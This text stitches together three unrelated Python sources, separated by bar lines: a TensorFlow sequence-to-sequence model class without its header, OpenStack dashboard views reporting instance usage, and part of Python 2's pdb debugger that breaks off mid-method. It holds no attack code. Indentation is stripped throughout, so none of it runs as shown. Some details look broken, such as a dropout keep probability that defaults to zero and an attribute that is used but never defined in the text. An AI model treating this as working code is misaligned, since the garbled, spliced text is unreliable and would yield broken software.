def __init__(self, source_vocab_size, target_vocab_size, buckets, size,
num_layers, max_gradient_norm, batch_size, learning_rate,
learning_rate_decay_factor, use_lstm=False,
num_samples=512, forward_only=False, output_keep_prob = 0):
"""Create the model.
Args:
source_vocab_size: size of the source vocabulary.
target_vocab_size: size of the target vocabulary.
buckets: a list of pairs (I, O), where I specifies maximum input length
that will be processed in that bucket, and O specifies maximum output
length. Training instances that have inputs longer than I or outputs
longer than O will be pushed to the next bucket and padded accordingly.
We assume that the list is sorted, e.g., [(2, 4), (8, 16)].
size: number of units in each layer of the model.
num_layers: number of layers in the model.
max_gradient_norm: gradients will be clipped to maximally this norm.
batch_size: the size of the batches used during training;
the model construction is independent of batch_size, so it can be
changed after initialization if this is convenient, e.g., for decoding.
learning_rate: learning rate to start with.
learning_rate_decay_factor: decay learning rate by this much when needed.
use_lstm: if true, we use LSTM cells instead of GRU cells.
num_samples: number of samples for sampled softmax.
forward_only: if set, we do not construct the backward pass in the model.
output_keep_prob: dropout keep probability applied to the LSTM cell
outputs (only used when use_lstm is true).
"""
self.source_vocab_size = source_vocab_size
self.target_vocab_size = target_vocab_size
self.buckets = buckets
self.batch_size = batch_size
self.learning_rate = tf.Variable(float(learning_rate), trainable=False)
self.learning_rate_decay_op = self.learning_rate.assign(
self.learning_rate * learning_rate_decay_factor)
self.global_step = tf.Variable(0, trainable=False)
self.output_keep_prob = output_keep_prob
# If we use sampled softmax, we need an output projection.
output_projection = None
softmax_loss_function = None
# Sampled softmax only makes sense if we sample less than vocabulary size.
if num_samples > 0 and num_samples < self.target_vocab_size:
with tf.device("/cpu:0"):
w = tf.get_variable("proj_w", [size, self.target_vocab_size])
w_t = tf.transpose(w)
b = tf.get_variable("proj_b", [self.target_vocab_size])
output_projection = (w, b)
def sampled_loss(inputs, labels):
with tf.device("/cpu:0"):
labels = tf.reshape(labels, [-1, 1])
return tf.nn.sampled_softmax_loss(w_t, b, inputs, labels, num_samples,
self.target_vocab_size)
softmax_loss_function = sampled_loss
# Create the internal multi-layer cell for our RNN.
single_cell = tf.nn.rnn_cell.GRUCell(size)
if use_lstm:
print('Using LSTM cell with output_keep_prob', self.output_keep_prob)
single_cell = tf.nn.rnn_cell.BasicLSTMCell(size)
single_cell = tf.nn.rnn_cell.DropoutWrapper(single_cell, output_keep_prob=self.output_keep_prob)
cell = single_cell
if num_layers > 1:
cell = tf.nn.rnn_cell.MultiRNNCell([single_cell] * num_layers)
# The seq2seq function: we use embedding for the input and attention.
def seq2seq_f(encoder_inputs, decoder_inputs, do_decode):
return tf.nn.seq2seq.embedding_attention_seq2seq(
encoder_inputs, decoder_inputs, cell,
num_encoder_symbols=source_vocab_size,
num_decoder_symbols=target_vocab_size,
embedding_size=size,
output_projection=output_projection,
feed_previous=do_decode)
# Feeds for inputs.
self.encoder_inputs = []
self.decoder_inputs = []
self.target_weights = []
for i in xrange(buckets[-1][0]): # Last bucket is the biggest one.
self.encoder_inputs.append(tf.placeholder(tf.int32, shape=[None],
name="encoder{0}".format(i)))
for i in xrange(buckets[-1][1] + 1):
self.decoder_inputs.append(tf.placeholder(tf.int32, shape=[None],
name="decoder{0}".format(i)))
self.target_weights.append(tf.placeholder(tf.float32, shape=[None],
name="weight{0}".format(i)))
# Our targets are decoder inputs shifted by one.
targets = [self.decoder_inputs[i + 1]
for i in xrange(len(self.decoder_inputs) - 1)]
# Training outputs and losses.
if forward_only:
self.outputs, self.losses = tf.nn.seq2seq.model_with_buckets(
self.encoder_inputs, self.decoder_inputs, targets,
self.target_weights, buckets, lambda x, y: seq2seq_f(x, y, True),
softmax_loss_function=softmax_loss_function)
# If we use output projection, we need to project outputs for decoding.
if output_projection is not None:
for b in xrange(len(buckets)):
self.outputs[b] = [
tf.matmul(output, output_projection[0]) + output_projection[1]
for output in self.outputs[b]
]
else:
self.outputs, self.losses = tf.nn.seq2seq.model_with_buckets(
self.encoder_inputs, self.decoder_inputs, targets,
self.target_weights, buckets,
lambda x, y: seq2seq_f(x, y, False),
softmax_loss_function=softmax_loss_function)
# Gradients and SGD update operation for training the model.
params = tf.trainable_variables()
if not forward_only:
self.gradient_norms = []
self.updates = []
#opt = tf.train.GradientDescentOptimizer(self.learning_rate)
#opt = tf.train.RMSPropOptimizer(self.learning_rate)
opt = tf.train.AdagradOptimizer(self.learning_rate)
for b in xrange(len(buckets)):
gradients = tf.gradients(self.losses[b], params)
clipped_gradients, norm = tf.clip_by_global_norm(gradients,
max_gradient_norm)
self.gradient_norms.append(norm)
self.updates.append(opt.apply_gradients(
zip(clipped_gradients, params), global_step=self.global_step))
self.saver = tf.train.Saver(tf.all_variables())
def step(self, session, encoder_inputs, decoder_inputs, target_weights,
bucket_id, forward_only):
"""Run a step of the model feeding the given inputs.
Args:
session: tensorflow session to use.
encoder_inputs: list of numpy int vectors to feed as encoder inputs.
decoder_inputs: list of numpy int vectors to feed as decoder inputs.
target_weights: list of numpy float vectors to feed as target weights.
bucket_id: which bucket of the model to use.
forward_only: whether to do the backward step or only forward.
Returns:
A triple consisting of gradient norm (or None if we did not do backward),
average perplexity, and the outputs.
Raises:
ValueError: if length of encoder_inputs, decoder_inputs, or
target_weights disagrees with bucket size for the specified bucket_id.
"""
# Check if the sizes match.
encoder_size, decoder_size = self.buckets[bucket_id]
if len(encoder_inputs) != encoder_size:
raise ValueError("Encoder length must be equal to the one in bucket,"
" %d != %d." % (len(encoder_inputs), encoder_size))
if len(decoder_inputs) != decoder_size:
raise ValueError("Decoder length must be equal to the one in bucket,"
" %d != %d." % (len(decoder_inputs), decoder_size))
if len(target_weights) != decoder_size:
raise ValueError("Weights length must be equal to the one in bucket,"
" %d != %d." % (len(target_weights), decoder_size))
# Input feed: encoder inputs, decoder inputs, target_weights, as provided.
input_feed = {}
for l in xrange(encoder_size):
input_feed[self.encoder_inputs[l].name] = encoder_inputs[l]
for l in xrange(decoder_size):
input_feed[self.decoder_inputs[l].name] = decoder_inputs[l]
input_feed[self.target_weights[l].name] = target_weights[l]
# Since our targets are decoder inputs shifted by one, we need one more.
last_target = self.decoder_inputs[decoder_size].name
input_feed[last_target] = np.zeros([self.batch_size], dtype=np.int32)
# Output feed: depends on whether we do a backward step or not.
if not forward_only:
output_feed = [self.updates[bucket_id], # Update Op that does SGD.
self.gradient_norms[bucket_id], # Gradient norm.
self.losses[bucket_id]] # Loss for this batch.
else:
output_feed = [self.losses[bucket_id]] # Loss for this batch.
for l in xrange(decoder_size): # Output logits.
output_feed.append(self.outputs[bucket_id][l])
outputs = session.run(output_feed, input_feed)
if not forward_only:
return outputs[1], outputs[2], None # Gradient norm, loss, no outputs.
else:
return None, outputs[0], outputs[1:] # No gradient norm, loss, outputs.
def get_batch(self, data, bucket_id):
"""Get a random batch of data from the specified bucket, prepare for step.
To feed data in step(..) it must be a list of batch-major vectors, while
data here contains single length-major cases. So the main logic of this
function is to re-index data cases to be in the proper format for feeding.
Args:
data: a tuple of size len(self.buckets) in which each element contains
lists of pairs of input and output data that we use to create a batch.
bucket_id: integer, which bucket to get the batch for.
Returns:
The triple (encoder_inputs, decoder_inputs, target_weights) for
the constructed batch that has the proper format to call step(...) later.
"""
encoder_size, decoder_size = self.buckets[bucket_id]
encoder_inputs, decoder_inputs = [], []
# Get a random batch of encoder and decoder inputs from data,
# pad them if needed, reverse encoder inputs and add GO to decoder.
for _ in xrange(self.batch_size):
encoder_input, decoder_input = random.choice(data[bucket_id])
# Encoder inputs are padded and then reversed.
encoder_pad = [data_utils.PAD_ID] * (encoder_size - len(encoder_input))
encoder_inputs.append(list(reversed(encoder_input + encoder_pad)))
# Decoder inputs get an extra "GO" symbol, and are padded then.
decoder_pad_size = decoder_size - len(decoder_input) - 1
decoder_inputs.append([data_utils.GO_ID] + decoder_input +
[data_utils.PAD_ID] * decoder_pad_size)
# Now we create batch-major vectors from the data selected above.
batch_encoder_inputs, batch_decoder_inputs, batch_weights = [], [], []
# Batch encoder inputs are just re-indexed encoder_inputs.
for length_idx in xrange(encoder_size):
batch_encoder_inputs.append(
np.array([encoder_inputs[batch_idx][length_idx]
for batch_idx in xrange(self.batch_size)], dtype=np.int32))
# Batch decoder inputs are re-indexed decoder_inputs, we create weights.
for length_idx in xrange(decoder_size):
batch_decoder_inputs.append(
np.array([decoder_inputs[batch_idx][length_idx]
for batch_idx in xrange(self.batch_size)], dtype=np.int32))
# Create target_weights to be 0 for targets that are padding.
batch_weight = np.ones(self.batch_size, dtype=np.float32)
for batch_idx in xrange(self.batch_size):
# We set weight to 0 if the corresponding target is a PAD symbol.
# The corresponding target is decoder_input shifted by 1 forward.
if length_idx < decoder_size - 1:
target = decoder_inputs[batch_idx][length_idx + 1]
if length_idx == decoder_size - 1 or target == data_utils.PAD_ID:
batch_weight[batch_idx] = 0.0
batch_weights.append(batch_weight)
return batch_encoder_inputs, batch_decoder_inputs, batch_weights
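# Minimal usage sketch (assumes `sess` is an open tf.Session, `model` is a
# constructed Seq2SeqModel and `train_set` is a list with one entry per
# bucket, each a list of (source_ids, target_ids) pairs; all three names are
# placeholders):
#
# bucket_id = 0
# encoder_inputs, decoder_inputs, target_weights = model.get_batch(
#     train_set, bucket_id)
# _, step_loss, _ = model.step(sess, encoder_inputs, decoder_inputs,
#                              target_weights, bucket_id, forward_only=False)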
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2011 Fourth Paradigm Development, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django import template
from django import http
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.shortcuts import render_to_response
from django.utils.translation import ugettext as _
import datetime
import logging
from django.contrib import messages
from django_openstack import api
from django_openstack import forms
from django_openstack.dash.views import instances as dash_instances
from openstackx.api import exceptions as api_exceptions
TerminateInstance = dash_instances.TerminateInstance
RebootInstance = dash_instances.RebootInstance
LOG = logging.getLogger('django_openstack.syspanel.views.instances')
def _next_month(date_start):
y = date_start.year + (date_start.month + 1)/13
m = ((date_start.month + 1)%13)
if m == 0:
m = 1
return datetime.date(y, m, 1)
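# For reference:
# _next_month(datetime.date(2011, 12, 1)) == datetime.date(2012, 1, 1)
# _next_month(datetime.date(2011, 3, 1)) == datetime.date(2011, 4, 1)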
def _current_month():
today = datetime.date.today()
return datetime.date(today.year, today.month,1)
def _get_start_and_end_date(request):
try:
date_start = datetime.date(int(request.GET['date_year']), int(request.GET['date_month']), 1)
except:
today = datetime.date.today()
date_start = datetime.date(today.year, today.month,1)
date_end = _next_month(date_start)
datetime_start = datetime.datetime.combine(date_start, datetime.time())
datetime_end = datetime.datetime.combine(date_end, datetime.time())
if date_end > datetime.date.today():
datetime_end = datetime.datetime.utcnow()
return (date_start, date_end, datetime_start, datetime_end)
@login_required
def usage(request):
(date_start, date_end, datetime_start, datetime_end) = _get_start_and_end_date(request)
service_list = []
usage_list = []
max_vcpus = max_gigabytes = 0
total_ram = 0
if date_start > _current_month():
messages.error(request, 'No data for the selected period')
date_end = date_start
datetime_end = datetime_start
else:
try:
service_list = api.service_list(request)
except api_exceptions.ApiException as e:
LOG.error('ApiException fetching service list in instance usage',
exc_info=True)
messages.error(request,
'Unable to get service info: %s' % e.message)
for service in service_list:
if service.type == 'nova-compute':
max_vcpus += service.stats['max_vcpus']
max_gigabytes += service.stats['max_gigabytes']
total_ram += settings.COMPUTE_HOST_RAM_GB
try:
usage_list = api.usage_list(request, datetime_start, datetime_end)
except api_exceptions.ApiException as e:
LOG.error('ApiException fetching usage list in instance usage'
' on date range "%s to %s"' % (datetime_start,
datetime_end),
exc_info=True)
messages.error(request, 'Unable to get usage info: %s' % e.message)
dateform = forms.DateForm()
dateform['date'].field.initial = date_start
global_summary = {'max_vcpus': max_vcpus, 'max_gigabytes': max_gigabytes,
'total_active_disk_size': 0, 'total_active_vcpus': 0,
'total_active_ram_size': 0}
for usage in usage_list:
# FIXME: api needs a simpler dict interface (with iteration) - anthony
# NOTE(mgius): Changed this on the api end. Not too much neater, but
# at least its not going into private member data of an external
# class anymore
#usage = usage._info
for k in usage._attrs:
v = usage.__getattr__(k)
if type(v) in [float, int]:
if k not in global_summary:
global_summary[k] = 0
global_summary[k] += v
max_disk_tb = used_disk_tb = available_disk_tb = 0
max_disk_tb = global_summary['max_gigabytes'] / float(1000)
used_disk_tb = global_summary['total_active_disk_size'] / float(1000)
available_disk_tb = (global_summary['max_gigabytes'] / float(1000) - \
global_summary['total_active_disk_size'] / float(1000))
used_ram = global_summary['total_active_ram_size'] / float(1024)
avail_ram = total_ram - used_ram
ram_unit = "GB"
if total_ram > 999:
ram_unit = "TB"
total_ram /= float(1024)
used_ram /= float(1024)
avail_ram /= float(1024)
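    # Worked example of the unit conversion above (illustrative numbers only):
    # with total_ram = 2048 GB and used_ram = 512 GB the unit flips to "TB"
    # and the template receives total_ram=2.0, used_ram=0.5, avail_ram=1.5.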
return render_to_response(
'syspanel_usage.html',{
'dateform': dateform,
'usage_list': usage_list,
'global_summary': global_summary,
'available_cores': global_summary['max_vcpus'] - global_summary['total_active_vcpus'],
'available_disk': global_summary['max_gigabytes'] - global_summary['total_active_disk_size'],
'max_disk_tb': max_disk_tb,
'used_disk_tb': used_disk_tb,
'available_disk_tb': available_disk_tb,
'total_ram': total_ram,
'used_ram': used_ram,
'avail_ram': avail_ram,
'ram_unit': ram_unit,
'external_links': settings.EXTERNAL_MONITORING,
    }, context_instance=template.RequestContext(request))
@login_required
def tenant_usage(request, tenant_id):
(date_start, date_end, datetime_start, datetime_end) = _get_start_and_end_date(request)
if date_start > _current_month():
messages.error(request, 'No data for the selected period')
date_end = date_start
datetime_end = datetime_start
dateform = forms.DateForm()
dateform['date'].field.initial = date_start
usage = {}
try:
usage = api.usage_get(request, tenant_id, datetime_start, datetime_end)
    except api_exceptions.ApiException as e:
        LOG.error('ApiException getting usage info for tenant "%s"'
                  ' on date range "%s to %s"' % (tenant_id,
                                                 datetime_start,
                                                 datetime_end),
                  exc_info=True)
        messages.error(request, 'Unable to get usage info: %s' % e.message)
running_instances = []
terminated_instances = []
if hasattr(usage, 'instances'):
now = datetime.datetime.now()
for i in usage.instances:
# this is just a way to phrase uptime in a way that is compatible
# with the 'timesince' filter. Use of local time intentional
i['uptime_at'] = now - datetime.timedelta(seconds=i['uptime'])
if i['ended_at']:
terminated_instances.append(i)
else:
running_instances.append(i)
return render_to_response('syspanel_tenant_usage.html', {
'dateform': dateform,
'usage': usage,
'instances': running_instances + terminated_instances,
'tenant_id': tenant_id,
    }, context_instance=template.RequestContext(request))
@login_required
def index(request):
for f in (TerminateInstance, RebootInstance):
_, handled = f.maybe_handle(request)
if handled:
return handled
instances = []
try:
instances = api.server_list(request)
except Exception as e:
LOG.error('Unspecified error in instance index', exc_info=True)
messages.error(request, 'Unable to get instance list: %s' % e.message)
# We don't have any way of showing errors for these, so don't bother
# trying to reuse the forms from above
terminate_form = TerminateInstance()
reboot_form = RebootInstance()
return render_to_response('syspanel_instances.html', {
'instances': instances,
'terminate_form': terminate_form,
'reboot_form': reboot_form,
}, context_instance=template.RequestContext(request))
@login_required
def refresh(request):
for f in (TerminateInstance, RebootInstance):
_, handled = f.maybe_handle(request)
if handled:
return handled
instances = []
try:
instances = api.server_list(request)
except Exception as e:
messages.error(request, 'Unable to get instance list: %s' % e.message)
# We don't have any way of showing errors for these, so don't bother
# trying to reuse the forms from above
terminate_form = TerminateInstance()
reboot_form = RebootInstance()
return render_to_response('_syspanel_instance_list.html', {
'instances': instances,
'terminate_form': terminate_form,
'reboot_form': reboot_form,
}, context_instance=template.RequestContext(request))
|
|
#! /usr/bin/env python
"""A Python debugger."""
# (See pdb.doc for documentation.)
import sys
import linecache
import cmd
import bdb
from repr import Repr
import os
import re
import pprint
import traceback
class Restart(Exception):
"""Causes a debugger to be restarted for the debugged python program."""
pass
# Create a custom safe Repr instance and increase its maxstring.
# The default of 30 truncates error messages too easily.
_repr = Repr()
_repr.maxstring = 200
_saferepr = _repr.repr
__all__ = ["run", "pm", "Pdb", "runeval", "runctx", "runcall", "set_trace",
"post_mortem", "help"]
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % re.escape(funcname))
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while 1:
line = fp.readline()
if line == '':
break
if cre.match(line):
answer = funcname, filename, lineno
break
lineno = lineno + 1
fp.close()
return answer
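# Illustrative result (the path and line number are hypothetical): if line 3
# of /tmp/example.py is "def spam():", then
#
#   find_function('spam', '/tmp/example.py') == ('spam', '/tmp/example.py', 3)
#
# and None is returned when the file cannot be opened or no matching def is
# found.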
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pdb is imported using the
# command "pdb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Pdb(bdb.Bdb, cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None):
bdb.Bdb.__init__(self)
cmd.Cmd.__init__(self, completekey, stdin, stdout)
if stdout:
self.use_rawinput = 0
self.prompt = '(Pdb) '
self.aliases = {}
self.mainpyfile = ''
self._wait_for_mainpyfile = 0
# Try to load readline if it exists
try:
import readline
except ImportError:
pass
# Read $HOME/.pdbrc and ./.pdbrc
self.rcLines = []
if 'HOME' in os.environ:
envHome = os.environ['HOME']
try:
rcFile = open(os.path.join(envHome, ".pdbrc"))
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
try:
rcFile = open(".pdbrc")
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
self.commands = {} # associates a command list to breakpoint numbers
self.commands_doprompt = {} # for each bp num, tells if the prompt must be disp. after execing the cmd list
self.commands_silent = {} # for each bp num, tells if the stack trace must be disp. after execing the cmd list
self.commands_defining = False # True while in the process of defining a command list
self.commands_bnum = None # The breakpoint number for which we are defining a list
def reset(self):
bdb.Bdb.reset(self)
self.forget()
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
def setup(self, f, t):
self.forget()
self.stack, self.curindex = self.get_stack(f, t)
self.curframe = self.stack[self.curindex][0]
self.execRcLines()
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
if self.rcLines:
# Make local copy because of recursion
rcLines = self.rcLines
# executed only once
self.rcLines = []
for line in rcLines:
line = line[:-1]
if len(line) > 0 and line[0] != '#':
self.onecmd(line)
# Override Bdb methods
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile:
return
if self.stop_here(frame):
print >>self.stdout, '--Call--'
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
if (self.mainpyfile != self.canonic(frame.f_code.co_filename)
or frame.f_lineno<= 0):
return
self._wait_for_mainpyfile = 0
if self.bp_commands(frame):
self.interaction(frame, None)
def bp_commands(self,frame):
""" Call every command that was set for the current active breakpoint (if there is one)
Returns True if the normal interaction function must be called, False otherwise """
#self.currentbp is set in bdb.py in bdb.break_here if a breakpoint was hit
if getattr(self,"currentbp",False) and self.currentbp in self.commands:
currentbp = self.currentbp
self.currentbp = 0
lastcmd_back = self.lastcmd
self.setup(frame, None)
for line in self.commands[currentbp]:
self.onecmd(line)
self.lastcmd = lastcmd_back
if not self.commands_silent[currentbp]:
self.print_stack_entry(self.stack[self.curindex])
if self.commands_doprompt[currentbp]:
self.cmdloop()
self.forget()
return
return 1
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
if self._wait_for_mainpyfile:
return
frame.f_locals['__return__'] = return_value
print >>self.stdout, '--Return--'
self.interaction(frame, None)
def user_exception(self, frame, exc_info):
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
if self._wait_for_mainpyfile:
return
exc_type, exc_value, exc_traceback = exc_info
frame.f_locals['__exception__'] = exc_type, exc_value
if type(exc_type) == type(''):
exc_type_name = exc_type
else: exc_type_name = exc_type.__name__
print >>self.stdout, exc_type_name + ':', _saferepr(exc_value)
self.interaction(frame, exc_traceback)
# General interaction function
def interaction(self, frame, traceback):
self.setup(frame, traceback)
self.print_stack_entry(self.stack[self.curindex])
self.cmdloop()
self.forget()
def displayhook(self, obj):
"""Custom displayhook for the exec in default(), which prevents
assignment of the _ variable in the builtins.
"""
# reproduce the behavior of the standard displayhook, not printing None
if obj is not None:
print repr(obj)
def default(self, line):
if line[:1] == '!': line = line[1:]
locals = self.curframe.f_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
save_stdout = sys.stdout
save_stdin = sys.stdin
save_displayhook = sys.displayhook
try:
sys.stdin = self.stdin
sys.stdout = self.stdout
sys.displayhook = self.displayhook
exec code in globals, locals
finally:
sys.stdout = save_stdout
sys.stdin = save_stdin
sys.displayhook = save_displayhook
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', v
def precmd(self, line):
"""Handle alias expansion and ';;' separator."""
if not line.strip():
return line
args = line.split()
while args[0] in self.aliases:
line = self.aliases[args[0]]
ii = 1
for tmpArg in args[1:]:
line = line.replace("%" + str(ii),
tmpArg)
ii = ii + 1
line = line.replace("%*", ' '.join(args[1:]))
args = line.split()
# split into ';;' separated commands
# unless it's an alias command
if args[0] != 'alias':
marker = line.find(';;')
if marker >= 0:
# queue up everything after marker
next = line[marker+2:].lstrip()
self.cmdqueue.append(next)
line = line[:marker].rstrip()
return line
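    # Illustrative expansions for precmd (not part of the original source),
    # assuming self.aliases == {'pi': 'p %1.__dict__'}:
    #
    #   "pi obj"      -> "p obj.__dict__"   (alias lookup plus %1 substitution)
    #   "p x ;; next" -> "p x", with "next" appended to self.cmdqueue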
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
Checks whether this line is typed at the normal prompt or in
a breakpoint command list definition.
"""
if not self.commands_defining:
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
def handle_command_def(self,line):
"""Handles one command line during command list definition."""
cmd, arg, line = self.parseline(line)
if not cmd:
return
if cmd == 'silent':
self.commands_silent[self.commands_bnum] = True
return # continue to handle other cmd def in the cmd list
elif cmd == 'end':
self.cmdqueue = []
return 1 # end of cmd list
cmdlist = self.commands[self.commands_bnum]
if arg:
cmdlist.append(cmd+' '+arg)
else:
cmdlist.append(cmd)
# Determine if we must stop
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
func = self.default
        if func.func_name in self.commands_resuming:  # one of the resuming commands.
self.commands_doprompt[self.commands_bnum] = False
self.cmdqueue = []
return 1
return
# Command definitions, called by cmdloop()
# The argument is the remaining string on the command line
# Return true to exit from the command loop
do_h = cmd.Cmd.do_help
def do_commands(self, arg):
"""Defines a list of commands associated to a breakpoint
Those commands will be executed whenever the breakpoint causes the program to stop execution."""
if not arg:
bnum = len(bdb.Breakpoint.bpbynumber)-1
else:
try:
bnum = int(arg)
except:
print >>self.stdout, "Usage : commands [bnum]\n ...\n end"
return
self.commands_bnum = bnum
self.commands[bnum] = []
self.commands_doprompt[bnum] = True
self.commands_silent[bnum] = False
prompt_back = self.prompt
self.prompt = '(com) '
self.commands_defining = True
try:
self.cmdloop()
finally:
self.commands_defining = False
self.prompt = prompt_back
def do_break(self, arg, temporary = 0):
# break [ ([filename:]lineno | function) [, "condition"] ]
if not arg:
if self.breaks: # There's at least one
print >>self.stdout, "Num Type Disp Enb Where"
for bp in bdb.Breakpoint.bpbynumber:
if bp:
bp.bpprint(self.stdout)
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
funcname = None
if colon >= 0:
filename = arg[:colon].rstrip()
f = self.lookupmodule(filename)
if not f:
print >>self.stdout, '*** ', repr(filename),
print >>self.stdout, 'not found from sys.path'
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError, msg:
print >>self.stdout, '*** Bad lineno:', arg
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self.curframe.f_globals,
self.curframe.f_locals)
except:
func = arg
try:
if hasattr(func, 'im_func'):
func = func.im_func
code = func.func_code
#use co_name to identify the bkpt (function names
#could be aliased, but co_name is invariant)
funcname = code.co_name
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self.lineinfo(arg)
if not ok:
print >>self.stdout, '*** The specified object',
print >>self.stdout, repr(arg),
print >>self.stdout, 'is not a function'
print >>self.stdout, 'or was not found along sys.path.'
return
funcname = ok # ok contains a function name
lineno = int(ln)
if not filename:
filename = self.defaultFile()
# Check for reasonable breakpoint
line = self.checkline(filename, lineno)
if line:
# now set the break point
err = self.set_break(filename, line, temporary, cond, funcname)
if err: print >>self.stdout, '***', err
else:
bp = self.get_breaks(filename, line)[-1]
print >>self.stdout, "Breakpoint %d at %s:%d" % (bp.number,
bp.file,
bp.line)
# To be overridden in derived debuggers
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
if filename == '<string>' and self.mainpyfile:
filename = self.mainpyfile
return filename
do_b = do_break
def do_tbreak(self, arg):
self.do_break(arg, 1)
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '': return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = self.lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
def checkline(self, filename, lineno):
"""Check whether specified line seems to be executable.
Return `lineno` if it is, 0 if not (e.g. a docstring, comment, blank
line or EOF). Warning: testing is not comprehensive.
"""
# this method should be callable before starting debugging, so default
# to "no globals" if there is no current frame
globs = self.curframe.f_globals if hasattr(self, 'curframe') else None
line = linecache.getline(filename, lineno, globs)
if not line:
print >>self.stdout, 'End of file'
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
print >>self.stdout, '*** Blank or comment'
return 0
return lineno
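    # Example outcomes (line numbers hypothetical): checkline(fname, 10)
    # returns 10 when line 10 holds executable code such as "x = 1", and 0
    # when it is blank, a comment, a docstring opener or past end of file.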
def do_enable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.enable()
def do_disable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.disable()
def do_condition(self, arg):
# arg is breakpoint number and condition
args = arg.split(' ', 1)
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
cond = args[1]
except:
cond = None
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.cond = cond
if not cond:
print >>self.stdout, 'Breakpoint', bpnum,
print >>self.stdout, 'is now unconditional.'
def do_ignore(self,arg):
"""arg is bp number followed by ignore count."""
args = arg.split()
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
count = int(args[1].strip())
except:
count = 0
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.ignore = count
if count > 0:
reply = 'Will ignore next '
if count > 1:
reply = reply + '%d crossings' % count
else:
reply = reply + '1 crossing'
print >>self.stdout, reply + ' of breakpoint %d.' % bpnum
else:
print >>self.stdout, 'Will stop next time breakpoint',
print >>self.stdout, bpnum, 'is reached.'
def do_clear(self, arg):
"""Three possibilities, tried in this order:
clear -> clear all breaks, ask for confirmation
clear file:lineno -> clear all breaks at file:lineno
clear bpno bpno ... -> clear breakpoints by number"""
if not arg:
try:
reply = raw_input('Clear all breaks? ')
except EOFError:
reply = 'no'
reply = reply.strip().lower()
if reply in ('y', 'yes'):
self.clear_all_breaks()
return
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except ValueError:
err = "Invalid line number (%s)" % arg
else:
err = self.clear_break(filename, lineno)
if err: print >>self.stdout, '***', err
